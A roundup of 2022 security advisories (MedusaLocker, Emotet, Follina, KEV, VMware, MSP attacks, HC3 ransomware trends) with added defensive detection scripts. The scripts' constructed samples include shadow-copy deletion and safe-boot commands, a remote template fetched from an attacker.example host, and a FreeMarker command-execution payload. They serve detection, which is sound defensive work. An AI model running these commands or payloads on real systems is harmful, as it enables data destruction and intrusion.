Advisory Concerning the MedusaLocker Ransomware Issued by FinCEN, FBI, and CISA

The Federal Bureau of Investigation (FBI), the Department of the Treasury, the Financial Crimes Enforcement Network (FinCEN), and the Cybersecurity and Infrastructure Security Agency (CISA) have published a joint cybersecurity advisory on MedusaLocker ransomware.

MedusaLocker appears to operate as a ransomware-as-a-service (RaaS) model, with affiliates carrying out the attacks and keeping around 55 to 60% of the ransom payments. MedusaLocker was first observed in September 2019 and has been used to attack a wide range of targets in the United States.

After gaining access to a victim's network, the actors use a batch file to execute a PowerShell script that propagates MedusaLocker throughout the network. The script edits the EnableLinkedConnections value in the infected machine's registry, which allows the infected machine to detect attached hosts and networks via Internet Control Message Protocol (ICMP) and to find shared storage via the Server Message Block (SMB) protocol.

MedusaLocker then kills security, accounting, and forensic software, restarts the machine in safe mode to avoid detection by security software, and encrypts the victim's files. All files are encrypted except those critical to the functioning of the victim's machine. The ransomware typically also deletes local backups and volume shadow copies and disables startup recovery options.
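The chain above (batch file starts PowerShell, EnableLinkedConnections is set, shadow copies are deleted, safe-mode reboot is staged, startup recovery is disabled) is a good fit for behaviour-based detection, because each step is also something an administrator might do once, and only the combination on one host is damning. The following is an added example of such a detector and is not code from the advisory. The events are constructed in a Sysmon-like shape (Event ID 1 for process creation, Event ID 13 for a registry value set); the advisory does not quote the exact command lines MedusaLocker runs, so the vssadmin, wbadmin and bcdedit forms matched here are the commonly observed ones and are an assumption of this example, as is the full registry path of EnableLinkedConnections.

```python
"""Behaviour-based detection of the MedusaLocker propagation and anti-recovery
steps: registry edit, shadow-copy deletion, safe-mode reboot, recovery disabled.
Added example, not code from the FBI/CISA advisory. Sample events are CONSTRUCTED."""
import re

# Registry value the propagation script edits, per the advisory. The key is the
# UAC policy key where that value lives (assumed here); setting it to 1 makes
# mapped network drives visible to elevated processes.
ENABLE_LINKED_CONNECTIONS = re.compile(
    r"\\Policies\\System\\EnableLinkedConnections$", re.IGNORECASE)

# (rule name, pattern over the process command line). Each is weak on its own;
# several on one host within a short time is the signal.
PROCESS_RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)", re.I)),
    ("backup_catalog_deletion",
     re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog", re.I)),
    ("safe_mode_reboot_staging",
     re.compile(r"\bbcdedit(\.exe)?\b.*\bsafeboot\b", re.I)),
    ("startup_recovery_disabled",
     re.compile(r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
]


def _dword_value(details: str):
    """Sysmon renders DWORD writes as 'DWORD (0x00000001)'; pull the integer out."""
    m = re.search(r"0x([0-9A-Fa-f]+)", details)
    return int(m.group(1), 16) if m else None


def evaluate(event: dict) -> list[str]:
    """Return the names of every rule a single event triggers (empty if none)."""
    hits = []
    if event.get("EventID") == 13:
        if ENABLE_LINKED_CONNECTIONS.search(event.get("TargetObject", "")):
            if (_dword_value(event.get("Details", "")) or 0) != 0:
                hits.append("enable_linked_connections_set")
    elif event.get("EventID") == 1:
        image = event.get("Image", "").lower()
        parent = event.get("ParentImage", "").lower()
        # The batch-file-launches-PowerShell step: cmd.exe as parent of powershell.exe.
        if image.endswith("\\powershell.exe") and parent.endswith("\\cmd.exe"):
            hits.append("powershell_spawned_by_batch")
        cmd = event.get("CommandLine", "")
        hits.extend(name for name, pat in PROCESS_RULES if pat.search(cmd))
    return hits


def triage(events: list[dict], threshold: int = 2) -> dict[str, list[str]]:
    """Group rule hits per host and report hosts that trip at least `threshold`
    distinct rules; a lone hit (an admin listing shadow copies, a logon script
    starting PowerShell) is not enough on its own."""
    per_host: dict = {}
    for ev in events:
        hits = evaluate(ev)
        if hits:
            per_host.setdefault(ev.get("Computer", "?"), set()).update(hits)
    return {host: sorted(rules) for host, rules in per_host.items()
            if len(rules) >= threshold}


# Constructed sample: WS01 shows the full chain; WS02 and WS03 show benign
# single hits. Paths and file names are placeholders, not indicators.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": PS, "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\spread.ps1"},
    {"EventID": 13, "Computer": "WS01", "Image": PS,
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 1, "Computer": "WS01", "ParentImage": r"C:\Users\Public\payload.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe", "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"EventID": 1, "Computer": "WS01", "ParentImage": r"C:\Users\Public\payload.exe",
     "Image": r"C:\Windows\System32\bcdedit.exe", "CommandLine": "bcdedit /set {default} safeboot minimal"},
    {"EventID": 1, "Computer": "WS01", "ParentImage": r"C:\Users\Public\payload.exe",
     "Image": r"C:\Windows\System32\bcdedit.exe", "CommandLine": "bcdedit /set {default} recoveryenabled no"},
    {"EventID": 1, "Computer": "WS02", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe", "CommandLine": "vssadmin.exe list shadows"},
    {"EventID": 1, "Computer": "WS03", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": PS, "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for host, rules in triage(SAMPLE_EVENTS).items():
        print(host, "->", ", ".join(rules))
```

Only WS01 is reported: it trips five distinct rules, while WS02 (a shadow-copy listing) and WS03 (a scripted PowerShell launch from cmd.exe) each trip at most one. In a SIEM the same logic is a correlation rule over a time window; the per-host threshold is the knob that trades false positives for early warning, and the safe-boot and recovery-disabled rules are worth alerting on alone in most environments.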

Several vectors are used to gain initial access, including phishing and spam email campaigns, some of which attach the ransomware payload directly to the email; however, by far the most common vector is exploitation of vulnerable Remote Desktop Protocol (RDP) configurations.

The advisory shares indicators of compromise (IoCs), including IP addresses, email addresses, Bitcoin wallet addresses, and Tor addresses known to be used by the group. Several mitigations are recommended, the most important of which are to remediate known vulnerabilities, enable and enforce multifactor authentication, and train staff to recognize and avoid phishing attempts.

HC3 Warns Healthcare Sector of Increasing Threat from Emotet Malware

The HHS Health Sector Cybersecurity Coordination Center (HC3) has issued an alert to the healthcare sector about the threat from Emotet malware. Emotet was first identified in 2014 and was originally a banking Trojan; the malware has since been updated with new capabilities. In addition to functioning as a banking Trojan, Emotet acts as a dropper for other malware and is offered to other cybercriminal groups under an infrastructure-as-a-service (IaaS) model. Attackers have used Emotet to deliver a range of malware, including IcedID, Qbot, TrickBot, Azorult, and ransomware payloads such as BitPaymer and Ryuk.

According to Europol, Emotet is the world's most dangerous malware, infecting one in five organizations. Data from Malwarebytes show that 80% of malware attacks on healthcare organizations involved Trojans, most commonly Emotet.

In late 2020, an international law enforcement operation targeted MUMMY SPIDER, the threat group that operates Emotet. Agencies from Canada, the U.S., and Europe took down the Emotet infrastructure in January 2021 and used it to remove the disabled malware from infected systems in April 2021.

Although Emotet activity stopped, MUMMY SPIDER began rebuilding the botnet not long afterward. In November 2021, security researchers identified new Emotet activity as the botnet was being rebuilt. According to HC3, Emotet's current command-and-control infrastructure consists of 246 systems (and growing), and the updated malware has an improved dropper and a different loader. The number of infected devices is growing rapidly.

Emotet is mostly delivered via email, usually through malicious Office attachments or links to websites that host the payload. Emotet has also occasionally been delivered through brute force attacks and exploitation of vulnerabilities. According to Proofpoint, the group has updated its tactics, techniques, and procedures (TTPs) and is testing new delivery methods, such as emails containing links to OneDrive. These new methods are being tested in small campaigns to gauge their effectiveness before possible use in larger campaigns. Proofpoint also notes that the group may have changed tactics and could continue conducting more limited attacks on selected targets.

Emotet can hijack email threads, self-propagate, and insert a copy of itself into replies sent to the victim's contacts. This distribution method is highly effective because the emails spreading the malware come from known and trusted senders, which increases the likelihood that attachments will be opened. In January, Emotet was observed delivering Cobalt Strike to infected systems.

The best defense against these attacks is layered security. HC3's alert provides an assessment of the malware and the TTPs used to deliver it, along with recommended government resources and mitigations.

Zero-Day Microsoft Office Vulnerability Can Be Exploited With Macros Disabled

Microsoft has issued a security advisory and published a workaround to prevent exploitation of a zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT).

The vulnerability is tracked as CVE-2022-30190 and has been dubbed Follina by security researchers. According to Microsoft, a remote code execution vulnerability exists when MSDT is invoked using the URL protocol from a calling application such as Word.

Over the weekend, the security researcher nao_sec identified a Word document that used the remote template feature to execute PowerShell commands on targeted systems via the ms-msdt URL protocol handler. In a blog post, security researcher Kevin Beaumont noted that Microsoft Defender did not flag the documents as malicious and that antivirus detection is poor because the documents used to exploit the vulnerability contain no malicious code themselves. Instead, they use a remote template to fetch an HTML file from a remote server, which invokes MSDT and allows an attacker to execute PowerShell commands.

Most email attacks that use attachments to deliver malware require macros to be enabled; this vulnerability, however, can be exploited even when macros are disabled. The vulnerability is triggered when the attachment is opened. Beaumont also reported that zero-click exploitation is possible with an RTF file, since the vulnerability can be triggered through the Windows Explorer preview pane without opening the document.
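Because the document itself carries no macro and no payload, the thing worth scanning for at the mail gateway is the external reference: a .docx is a ZIP of XML parts, each part's relationships live in a matching .rels file, and a relationship with TargetMode="External" and an http(s) target makes Word fetch that URL when the document is opened (the remote template technique described above). The scanner below is an added example, not code from Microsoft, nao_sec, or Kevin Beaumont. The sample documents are constructed in memory; the host name and file names in them are placeholders, not indicators from the page.

```python
"""Flag .docx files whose template or embedded object is fetched from a remote
server, the delivery technique Follina documents use. Added example; the sample
documents are CONSTRUCTED and the URLs in them are placeholders."""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL_PREFIX = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def external_relationships(docx_bytes: bytes) -> list[dict]:
    """Every relationship in the package that points outside it over http/https,
    with the .rels part it came from and the (shortened) relationship type."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("TargetMode") == "External"
                        and target.lower().startswith(("http://", "https://"))):
                    findings.append({
                        "part": name,
                        "type": rel.get("Type", "").removeprefix(OOXML_REL_PREFIX),
                        "target": target,
                    })
    return findings


def is_suspicious(docx_bytes: bytes) -> bool:
    """A remote template or remote OLE object is loaded automatically when the
    document opens, so it is flagged. An ordinary hyperlink is external too but
    needs a click, so it is reported by external_relationships() and not flagged."""
    return any(f["type"] in ("attachedTemplate", "oleObject")
               for f in external_relationships(docx_bytes))


def build_docx(rels: dict[str, list[tuple[str, str, str, bool]]]) -> bytes:
    """CONSTRUCTED minimal .docx: just enough parts for the scanner to read.
    rels maps a .rels part name to (Id, short Type, Target, is_external) tuples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        zf.writestr("word/document.xml",
                    "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        for part, entries in rels.items():
            root = ET.Element(f"{{{RELS_NS}}}Relationships")
            for rid, rtype, target, external in entries:
                attrs = {"Id": rid, "Type": OOXML_REL_PREFIX + rtype, "Target": target}
                if external:
                    attrs["TargetMode"] = "External"
                ET.SubElement(root, f"{{{RELS_NS}}}Relationship", attrs)
            zf.writestr(part, ET.tostring(root))
    return buf.getvalue()


# A benign document: local styles part plus a user-clickable hyperlink.
BENIGN_DOCX = build_docx({
    "word/_rels/document.xml.rels": [
        ("rId1", "styles", "styles.xml", False),
        ("rId2", "hyperlink", "https://example.com/policy", True),
    ],
})

# A document whose attached template is pulled from a remote server; the
# attachedTemplate relationship is resolved from word/settings.xml's .rels.
REMOTE_TEMPLATE_DOCX = build_docx({
    "word/_rels/document.xml.rels": [("rId1", "styles", "styles.xml", False)],
    "word/_rels/settings.xml.rels": [
        ("rId1", "attachedTemplate", "http://attacker.example/template.html", True),
    ],
})

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOCX), ("remote-template", REMOTE_TEMPLATE_DOCX)):
        print(label, is_suspicious(doc), external_relationships(doc))
```

The scanner deliberately does not look at the URL's content, which is what signature-based tools were missing: the decision is made on document structure alone. RTF is a different container (plain text with control words, no ZIP), so the zero-click preview-pane variant mentioned above needs a separate check of RTF control words for remote references; the same structural idea applies.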

Microsoft said that an attacker who successfully exploits the vulnerability can run arbitrary code with the privileges of the calling application, allowing them to install programs; view, change, or delete data; or create new accounts in the context permitted by the user's rights. The vulnerability can be exploited in all Office versions from Office 2013 onward, including the current version of Office 365.

The vulnerability was first reported to Microsoft in April. It has been assigned a CVSS score of 7.8 out of 10 (high severity); Microsoft did not rate it as critical. Microsoft has published a workaround, which involves disabling the MSDT URL protocol until a patch is released. Prompt action is advised, since vulnerabilities that can be exploited through Office documents are quickly adopted by threat actors, especially when they can be exploited with macros disabled.

Several threat actors are known to be exploiting the vulnerability, including the Chinese threat actor TA413, according to Proofpoint. Palo Alto Networks' Unit 42 team said that, given the amount of publicly available information, the ease of use, and the high effectiveness of the exploit, it strongly recommends following Microsoft's guidance to protect the enterprise until a patch is released.

CISA Adds 75 Vulnerabilities to the Known Exploited Vulnerabilities Catalog

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) added 75 vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog. The catalog lists vulnerabilities in software and operating systems that are known to have been exploited in real-world attacks; it now contains 737 vulnerabilities.

The additions were made in three batches: 21 on Tuesday, 20 on Wednesday, and 34 on Thursday. Under Binding Operational Directive (BOD) 22-01, all Federal Civilian Executive Branch (FCEB) agencies must check for the vulnerabilities and patch or mitigate them within two weeks.

Almost none of the vulnerabilities added last week are new. In many cases, patches were released several years ago, and some of the vulnerabilities were publicly disclosed 12 years ago. Several affect products that have already reached end-of-life, such as Virtual System/Server Administrator (VSA), Adobe Flash Player, InfoSphere BigInsights, and Microsoft Silverlight. Where those products are still installed or in use, they should be removed or disconnected.

The new additions include CVE-2022-20821, an open port vulnerability in Cisco IOS XR; CVE-2021-30883, a memory corruption vulnerability affecting several Apple products; and two Android kernel vulnerabilities: CVE-2021-1048, a use-after-free, and CVE-2021-0920, a race condition.

The vulnerabilities affect products from Adobe, Apple, Android, Artifex, Cisco, IBM, Google, Kaseya, Linux, Microsoft, Meta Platforms, Mozilla, QNAP, Oracle, Red Hat, and WebKitGTK.

Although BOD 22-01 applies only to FCEB agencies, CISA urges all organizations to reduce their exposure to cyberattacks by remediating the vulnerabilities in the Known Exploited Vulnerabilities Catalog promptly as part of their vulnerability management practices.
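The practical way to act on the catalog outside the FCEB is to consume it as data rather than as news: CISA publishes the catalog as a JSON feed (known_exploited_vulnerabilities.json) whose entries carry cveID, vendorProject, product, vulnerabilityName, dateAdded, requiredAction and dueDate fields, and those due dates can drive an organization's own SLA. The code below is an added example, not CISA tooling. The feed sample is constructed with the real field names but illustrative dates and descriptions (the CVE IDs are the ones named above; the due dates shown are not the catalog's actual values), and the inventory list stands in for the output of a vulnerability scanner.

```python
"""Cross-reference the CVEs present in an environment against the CISA KEV
catalog feed and rank them by remediation due date. Added example, not CISA
code; SAMPLE_FEED is CONSTRUCTED with the feed's field names but illustrative
dates, and INVENTORY_CVES stands in for scanner output."""
import json
from datetime import date

SAMPLE_FEED = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2022.05.25",
    "dateReleased": "2022-05-25T00:00:00.0000Z",
    "count": 3,
    "vulnerabilities": [
        {"cveID": "CVE-2022-20821", "vendorProject": "Cisco", "product": "IOS XR",
         "vulnerabilityName": "Cisco IOS XR Open Port Vulnerability",
         "dateAdded": "2022-05-25", "shortDescription": "Illustrative entry.",
         "requiredAction": "Apply updates per vendor instructions.",
         "dueDate": "2022-06-15", "notes": ""},
        {"cveID": "CVE-2021-30883", "vendorProject": "Apple", "product": "Multiple Products",
         "vulnerabilityName": "Apple Memory Corruption Vulnerability",
         "dateAdded": "2022-05-23", "shortDescription": "Illustrative entry.",
         "requiredAction": "Apply updates per vendor instructions.",
         "dueDate": "2022-06-13", "notes": ""},
        {"cveID": "CVE-2021-1048", "vendorProject": "Android", "product": "Kernel",
         "vulnerabilityName": "Android Kernel Use-After-Free Vulnerability",
         "dateAdded": "2022-05-25", "shortDescription": "Illustrative entry.",
         "requiredAction": "Apply updates per vendor instructions.",
         "dueDate": "2022-06-15", "notes": ""},
    ],
})

# CVE-0000-0000 is a placeholder for a finding that is NOT in the catalog.
INVENTORY_CVES = ["CVE-2022-20821", "CVE-2021-30883", "CVE-0000-0000"]


def load_catalog(feed_text: str) -> dict[str, dict]:
    """Index catalog entries by CVE ID so inventory lookups are O(1)."""
    data = json.loads(feed_text)
    return {entry["cveID"]: entry for entry in data["vulnerabilities"]}


def prioritize(catalog: dict[str, dict], present_cves, today: date) -> list[dict]:
    """For every present CVE that is in the catalog, return the entry plus the
    days until its due date (negative means overdue), most urgent first.
    CVEs absent from the catalog are not returned: they still need patching under
    the normal SLA, but KEV entries jump the queue."""
    rows = []
    for cve in present_cves:
        entry = catalog.get(cve)
        if entry is None:
            continue
        due = date.fromisoformat(entry["dueDate"])
        rows.append({
            "cve": cve,
            "product": f'{entry["vendorProject"]} {entry["product"]}',
            "due": due.isoformat(),
            "days_left": (due - today).days,
            "action": entry["requiredAction"],
        })
    rows.sort(key=lambda r: (r["days_left"], r["cve"]))
    return rows


def overdue(rows: list[dict]) -> list[dict]:
    """Subset of prioritized rows whose due date has already passed."""
    return [r for r in rows if r["days_left"] < 0]


if __name__ == "__main__":
    catalog = load_catalog(SAMPLE_FEED)
    for row in prioritize(catalog, INVENTORY_CVES, date(2022, 6, 14)):
        flag = "OVERDUE" if row["days_left"] < 0 else f'{row["days_left"]}d left'
        print(f'{row["cve"]:16} {row["product"]:24} due {row["due"]} ({flag})')
```

Run against the real feed, the only change is reading the JSON from CISA's site instead of SAMPLE_FEED; the due dates then come from the catalog and the reference date from the clock. Keeping the output keyed on days_left rather than on CVSS is the point: KEV membership already says the flaw is exploited, so the remaining question is only how late you are.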

CISA Issues Emergency Directive to Patch Vulnerable VMware Products

The Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive requiring all federal agencies to address two vulnerabilities in certain VMware products that are likely to be exploited in the wild shortly, together with two earlier VMware vulnerabilities disclosed in April that are being exploited by multiple threat actors, including Advanced Persistent Threat (APT) groups.

The newest vulnerabilities, tracked as CVE-2022-22973 (high severity) and CVE-2022-22972 (critical), together with the two vulnerabilities disclosed in April, affect five VMware products:

  • VMware Workspace ONE Access (Access) Appliance
  • VMware vRealize Automation (vRA)
  • vRealize Suite Lifecycle Manager
  • VMware Identity Manager (vIDM) Appliance
  • VMware Cloud Foundation

CVE-2022-22972 is an authentication bypass vulnerability affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation that concerns local domain users. A malicious actor with network access to the UI can exploit it to obtain administrative access without authenticating. It has a CVSS score of 9.8 out of 10.

CVE-2022-22973 is a local privilege escalation vulnerability in VMware Workspace ONE Access and Identity Manager with a CVSS score of 7.8. A malicious actor with local access can exploit it to escalate privileges to root. Both vulnerabilities also affect vRealize Suite Lifecycle Manager and VMware Cloud Foundation.

The two vulnerabilities known to have been exploited in the wild are tracked as CVE-2022-22960 (high severity) and CVE-2022-22954 (critical). CISA says both have been exploited in real-world attacks, separately and in combination, by multiple threat actors.

CVE-2022-22954 is a code injection vulnerability with a CVSS score of 9.8 affecting VMware Workspace ONE Access and Identity Manager. Exploiting it triggers server-side template injection, which can lead to remote code execution. CVE-2022-22960 is an improper privilege management vulnerability with a CVSS score of 7.8 affecting VMware Workspace ONE Access, Identity Manager, and vRealize Automation that allows a threat actor to escalate privileges to root.

In one attack, a threat actor with network access to the web interface exploited CVE-2022-22954 to execute a shell command as the VMware user, then exploited CVE-2022-22960 to escalate privileges to root. After exploiting the two vulnerabilities, the threat actor can move laterally to other systems, escalate privileges, and wipe logs. In another incident, a threat actor deployed the Dingo J-spy web shell after exploiting the vulnerabilities. Exploits for the two April vulnerabilities were developed by reverse-engineering the patches VMware released; now that patches are available for the two newest vulnerabilities, rapid exploitation in the wild should likewise be expected.
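Because CVE-2022-22954 is exploited by feeding a template expression to the web tier, the web server access log is where the first contact shows up, and the tell is template syntax in a parameter value rather than any particular endpoint. The following is an added example of scanning access logs for such probes; it is not code from CISA or VMware, and the request paths and parameter names in the constructed log lines are hypothetical, not the product's real endpoints. The expression syntax it keys on is FreeMarker-style (the template engine used by these appliances is not stated on this page, so treat the marker list as a general SSTI screen).

```python
"""Find server-side template injection probes in web access logs. Added
example; sample lines are CONSTRUCTED and their paths/parameters hypothetical."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Template-expression delimiters plus the Java class names an attacker uses to
# turn template evaluation into command execution.
SSTI_MARKERS = re.compile(
    r"(\$\{.*?\}|#\{.*?\}|<#assign|freemarker\.template|\?new\(\)|"
    r"java\.lang\.Runtime|ProcessBuilder|getRuntime\(\))",
    re.IGNORECASE,
)

# Common/combined log format: client, ident, user, [time], "METHOD target PROTO", status, size
LOG = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)


def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode until stable: attackers double-encode to slip past
    filters that decode only once."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value


def find_ssti_probes(lines) -> list[dict]:
    """One finding per request whose path or any query parameter, after full
    decoding, contains a template marker. The HTTP status is kept because a
    2xx on a probe suggests the expression was evaluated rather than rejected."""
    hits = []
    for line in lines:
        m = LOG.match(line)
        if not m:
            continue
        parsed = urlsplit(m["target"])
        candidates = [("path", decode_fully(parsed.path))] + [
            (key, decode_fully(val))
            for key, val in parse_qsl(parsed.query, keep_blank_values=True)
        ]
        for where, value in candidates:
            found = SSTI_MARKERS.search(value)
            if found:
                hits.append({"src": m["src"], "ts": m["ts"], "path": parsed.path,
                             "param": where, "marker": found.group(0),
                             "status": int(m["status"])})
                break
    return hits


# Constructed access log. 192.0.2.x / 203.0.113.x are documentation ranges.
SAMPLE_ACCESS_LOG = [
    # Benign traffic.
    '192.0.2.10 - - [24/May/2022:10:14:55 +0000] "GET /portal/verify?device=ab12cd34 HTTP/1.1" 200 812',
    '192.0.2.11 - - [24/May/2022:10:14:58 +0000] "GET /search?q=budget%202022 HTTP/1.1" 200 4120',
    # Single-encoded FreeMarker expression that instantiates a class to run "id".
    '203.0.113.9 - - [24/May/2022:10:15:01 +0000] "GET /portal/verify?error=&device='
    '%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22id%22%29%7D HTTP/1.1" 400 512',
    # Double-encoded arithmetic probe (${7*7}) used to confirm evaluation.
    '203.0.113.9 - - [24/May/2022:10:15:07 +0000] "GET /portal/verify?device=%2524%257B7*7%257D HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for hit in find_ssti_probes(SAMPLE_ACCESS_LOG):
        print(f'{hit["src"]} {hit["path"]} param={hit["param"]} status={hit["status"]} marker={hit["marker"]}')
```

Two findings come back, both from the same source: the command-execution attempt (rejected with a 400 in this constructed sample) and the double-encoded arithmetic check that returned 200. On a real appliance, the follow-on to a hit like this is exactly the chain described above, so the next things to pull are process and auth logs from the same host for shell activity as the VMware service account and for privilege escalation to root.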

Although the emergency directive applies only to federal agencies, all organizations using vulnerable VMware products should patch immediately or apply the recommended mitigations. Federal agencies must complete the required actions by May 23 to 24, 2022.

Five Eyes Intelligence Alliance Warns of Increasing Cyberattacks on Managed Service Providers

The Five Eyes intelligence alliance, made up of cybersecurity agencies from the U.K., U.S., New Zealand, Canada, and Australia, has issued a joint advisory warning of the growing number of cyberattacks targeting managed service providers (MSPs).

MSPs are attractive targets for cybercriminals and nation-state threat actors. Many organizations rely on MSPs to provide information and communication technology (ICT) and IT infrastructure services, since that is usually easier and cheaper than building those capabilities in house.

To deliver those services, MSPs need reliable connectivity and privileged access to their customers' systems. Threat actors compromise vulnerable MSPs and use them as an initial access vector into the networks of all the organizations they support. It is far easier to attack one vulnerable MSP and gain access to several businesses than to target those organizations directly.

When MSP systems are compromised, the intrusion may go undetected for months. During that time, attackers can conduct cyber espionage against the MSP and its customers or prepare follow-on activity such as ransomware attacks.

The Five Eyes agencies provide baseline security measures that MSPs and their customers should implement, and recommend that customers review their contracts with MSPs to ensure they require the MSP to implement the recommended practices and controls.

Steps must be taken to harden defenses to prevent the initial compromise. Threat actors commonly exploit vulnerable devices and internet-facing services and conduct phishing and brute force attacks to gain a foothold in MSP systems. The Five Eyes agencies urge MSPs and their customers to:

  • Improve the security of vulnerable devices
  • Secure internet-facing services
  • Protect against brute force and password spraying
  • Protect against phishing

It is essential to enable or improve monitoring and logging so that intrusions can be detected quickly. Because attackers may be present in a network for months, organizations should retain their most important logs for at least six months. The agencies recommend implementing and maintaining a segregated logging regime, whether through a comprehensive security information and event management (SIEM) solution or discrete logging tools, to identify threats to the environment.

Remote access applications must be secured and multi-factor authentication (MFA) enforced wherever possible, and MFA must be in place on all accounts that have access to customer environments. MSP customers should ensure their contracts state that MFA must be used on the accounts used to access their systems.

The Five Eyes agencies also recommend:

  • Handling internal architecture threats and segregating internal networks
  • Deprecating obsolete accounts and infrastructure
  • Using the principle of least privilege
  • Implementing software updates and patches quickly
  • Creating and executing incident response and recovery plans
  • Backing up systems and information on a regular basis and evaluating backups
  • Understanding and proactively managing supply chain risk
  • Managing account authentication and authorization
  • Promoting transparency

MSPs and their customers have unique environments, so the guidance should be applied as appropriate to their specific security needs and regulatory requirements.

HC3 Reveals Trends in Ransomware Attacks on the HPH Sector

The tactics, techniques, and procedures (TTPs) used by ransomware and other threat actors are constantly evolving to evade detection and make attacks more effective. The Department of Health and Human Services' Health Sector Cybersecurity Coordination Center (HC3) has analyzed and shared the TTPs used in the first quarter of 2022.

In Q1 2022, most ransomware attacks on the Healthcare and Public Health (HPH) sector were conducted by five ransomware-as-a-service groups. LockBit 2.0 and Conti were each responsible for 31% of attacks, followed by SunCrypt (16%) and ALPHV/BlackCat and Hive (11% each). The financially motivated threat groups FIN7 and FIN12 have also shifted to ransomware operations, with FIN7 working with ALPHV and FIN12 heavily involved in attacks on the HPH sector. FIN12's involvement has reduced the time to execute an attack from 5 days to 2 days.

Ransomware gangs frequently work with initial access brokers (IABs), who specialize in gaining access to organizations' networks and then sell that access to ransomware groups. Using IABs lets ransomware gangs concentrate on developing their ransomware variants and running their RaaS operations, refining their TTPs and conducting attacks that succeed. HC3 observed no change in the number of IABs working with ransomware groups in Q1 2022 compared with the numbers observed throughout 2021.

IABs were most often seen advertising generic VPN/RDP access to HPH entities' systems on cybercrime forums, accounting for more than 50% of forum advertisements, with about 25% of ads offering compromised Citrix/VPN appliances. Organizations rapidly deployed remote access solutions to support a remote workforce during the COVID-19 pandemic, but the rush to deploy meant standard security features were often not implemented, and vulnerabilities were widely exploited.

Ransomware gangs are increasingly using living-off-the-land (LOTL) techniques, abusing legitimate tools that are already present in enterprise environments, such as Task Scheduler, cmd.exe, PowerShell, Sysinternals utilities, and MSHTA. Using these tools makes the gangs' malicious activity harder to detect.

Tactics include the use of:

  • remote access tools such as Atera, AnyDesk, ManageEngine, and ScreenConnect, along with Windows Safe Mode
  • encryption tools such as DiskCryptor and BitLocker
  • file transfer tools such as FileZilla FTP
  • Sysinternals and similar utilities such as ProcDump, Dumpert, and PsExec
  • open-source tools such as Cobalt Strike, Mimikatz, Process Hacker, AdFind, and MegaSync

Although malicious use of these tools is hard for security teams to detect, there are detection opportunities. HC3 recommends a behavior-based approach, for example through a Security Information and Event Management (SIEM) tool, which can detect malicious use of LOTL tools that signature-based tools cannot.

The HC3 Ransomware Trends in the HPH Sector report provides detailed information on the TTPs used by each ransomware operation, including the most commonly abused LOTL tools, the relevant ATT&CK techniques, and an extensive list of mitigations for preventing, detecting, responding to, and recovering from ransomware attacks.

CISA Releases Guidance on Sharing Cyber Event Information

The Cybersecurity and Infrastructure Security Agency (CISA) has published a fact sheet on sharing cyber event information to help organizations report cyberattacks, which in turn helps the agency reduce current and emerging cybersecurity threats to U.S. critical infrastructure.

Following the passage of the Cyber Incident Reporting for Critical Infrastructure Act of 2022 (CIRCIA), a rulemaking process will begin to implement its statutory requirements; in the meantime, the fact sheet serves as interim guidance for organizations on the voluntary sharing of information about cyber events.

Sharing cyber event information is a key part of collective defense against cyber threats and strengthens U.S. cyber defenses. Rapid sharing of threat information with CISA allows it to issue timely warnings and offer assistance to other organizations so they can avoid falling victim to similar attacks. With access to this information, CISA can identify attack patterns that will guide future efforts to protect the nation's critical infrastructure.

The fact sheet explains how organizations can help, what actions to take, and what information to share. Organizations should observe the activity, act to mitigate the threat, and then report the incident to CISA. CISA is requesting cyber event information from critical infrastructure owners and operators and from federal, state, local, tribal, and territorial government partners.

CISA wants to receive information on unauthorized system access, denial-of-service (DoS) attacks lasting more than 12 hours, the discovery of malicious code on systems, targeted and repeated scans of systems, repeated attempts by unauthorized persons to access systems, email or mobile messages associated with phishing attempts or successful phishing attacks, and ransomware attacks on critical infrastructure organizations.

